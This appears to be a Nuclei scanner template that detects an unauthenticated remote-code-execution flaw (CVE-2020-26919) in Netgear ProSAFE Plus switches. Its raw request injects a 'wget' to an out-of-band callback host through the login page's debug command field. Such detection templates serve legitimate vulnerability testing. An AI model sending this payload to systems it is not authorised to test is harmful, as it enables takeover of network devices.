id: CVE-2020-26919

info:
  name: Netgear ProSAFE Plus - Unauthenticated Remote Code Execution
  author: gy741
  severity: critical
  description: Every section of the web interface can be used as a valid endpoint for POST requests, with the action defined by the submitId argument. The problem is located in the login.html webpage, which has to be publicly available to perform login requests but does not implement any restriction on executing debug actions. This allows users to execute system commands.
  reference: |
    - https://research.nccgroup.com/2021/03/08/technical-advisory-multiple-vulnerabilities-in-netgear-prosafe-plus-jgs516pe-gs116ev2-switches/
    - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/
  tags: cve,cve2020,netgear,rce,oob

requests:
  - raw:
      - |
        POST /login.htm HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept: */*
        Connection: close

        submitId=debug&debugCmd=wget+http://{{interactsh-url}}&submitEnd=

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP interaction
        words:
          - "http"